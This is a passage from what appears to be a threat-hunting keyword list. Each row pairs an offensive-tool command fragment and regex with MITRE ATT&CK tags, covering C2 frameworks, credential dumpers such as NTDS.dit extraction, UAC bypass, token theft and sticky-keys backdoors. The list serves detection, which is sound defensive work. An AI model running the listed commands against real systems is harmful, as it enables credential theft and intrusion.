*",".{0,1000}\sSspiUacBypass\s.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "* sstp-discover.nse*",".{0,1000}\ssstp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* st client wss://*",".{0,1000}\sst\sclient\swss\:\/\/.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "* st teamserver *",".{0,1000}\sst\steamserver\s.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "* --stack-name catspin *",".{0,1000}\s\-\-stack\-name\scatspin\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -process64 *.exe -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-process64\s.{0,1000}\.exe\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -unhook -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-unhook\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -unhook -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-unhook\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* start covenant*",".{0,1000}\sstart\scovenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "* start_campaign.py*",".{0,1000}\sstart_campaign\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "* start_hidden_process*",".{0,1000}\sstart_hidden_process.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* StayKit.cna*",".{0,1000}\sStayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "* steal_token /process:* /command:*",".{0,1000}\ssteal_token\s\/process\:.{0,1000}\s\/command\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "* stealthily grabs passwords and browser history from windows systems*",".{0,1000}\sstealthily\sgrabs\s\spasswords\sand\sbrowser\shistory\sfrom\swindows\ssystems.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "* stickykey.ps1*",".{0,1000}\sstickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "* Stickykeys.sh*",".{0,1000}\sStickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "* Stompy.ps1*",".{0,1000}\sStompy\.ps1.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "* StomPY.py *",".{0,1000}\sStomPY\.py\s.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "* stop covenant*",".{0,1000}\sstop\scovenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "* striker.py*",".{0,1000}\sstriker\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* string DCSync(*",".{0,1000}\sstring\sDCSync\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "* --string 'venomcoming' *",".{0,1000}\s\-\-string\s\'venomcoming\'\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "* --string 'venomleaving' *",".{0,1000}\s\-\-string\s\'venomleaving\'\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "* stun-info.nse*",".{0,1000}\sstun\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* stun-version.nse*",".{0,1000}\sstun\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* stuxnet-detect.nse*",".{0,1000}\sstuxnet\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* submit_to_nemesis.py*",".{0,1000}\ssubmit_to_nemesis\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* submit_to_nemesis.sh*",".{0,1000}\ssubmit_to_nemesis\.sh.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* Successful authentication. Access and refresh tokens have been written to the global $apptokens variable. To use them with other GraphRunner modules use the Tokens flag *",".{0,1000}\sSuccessful\sauthentication\.\sAccess\sand\srefresh\stokens\shave\sbeen\swritten\sto\sthe\sglobal\s\$apptokens\svariable\.\sTo\suse\sthem\swith\sother\sGraphRunner\smodules\suse\sthe\sTokens\sflag\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* supermicro-ipmi-conf.nse*",".{0,1000}\ssupermicro\-ipmi\-conf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Supershell.tar.gz*",".{0,1000}\sSupershell\.tar\.gz.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "* -sV --script vulners *",".{0,1000}\s\-sV\s\-\-script\svulners\s.{0,1000}","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* svn-brute.nse*",".{0,1000}\ssvn\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* SW2_HashSyscall*",".{0,1000}\sSW2_HashSyscall.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* SweetPotato by @_EthicalChaos*",".{0,1000}\sSweetPotato\sby\s\@_EthicalChaos.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","0","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "* Sweetpotato.exe*",".{0,1000}\sSweetpotato\.exe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "* --syscalls GetSyscallStub*",".{0,1000}\s\-\-syscalls\sGetSyscallStub.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* -syscalls -sleep=*.exe*",".{0,1000}\s\-syscalls\s\-sleep\=.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* --syscalls SysWhispers3*",".{0,1000}\s\-\-syscalls\sSysWhispers3.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* -system * -ntds *ntds.dit*",".{0,1000}\s\-system\s.{0,1000}\s\-ntds\s.{0,1000}ntds\.dit.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "* -system SYSTEM -ntds NTDS.dit LOCAL*",".{0,1000}\s\-system\sSYSTEM\s\-ntds\sNTDS\.dit\sLOCAL.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -system SYSTEM -ntds NTDS.dit -outputfile*",".{0,1000}\s\-system\sSYSTEM\s\-ntds\sNTDS\.dit\s\-outputfile.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* --syswhispers --jump*",".{0,1000}\s\-\-syswhispers\s\-\-jump.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* SysWhispers*",".{0,1000}\sSysWhispers.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "* -t *https://autodiscover.*/autodiscover/autodiscover.xml*autodiscover*",".{0,1000}\s\-t\s.{0,1000}https\:\/\/autodiscover\..{0,1000}\/autodiscover\/autodiscover\.xml.{0,1000}autodiscover.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "* -t 127.0.0.1 -p 1337 *",".{0,1000}\s\-t\s127\.0\.0\.1\s\-p\s1337\s.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "* -t BindShell -p *pwned\pipe\spoolss*",".{0,1000}\s\-t\sBindShell\s\-p\s.{0,1000}pwned\\pipe\\spoolss.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "* -t C2concealer *",".{0,1000}\s\-t\sC2concealer\s.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "* -t CreateProcessAsUserW -p *pwned\pipe\spoolss* -e 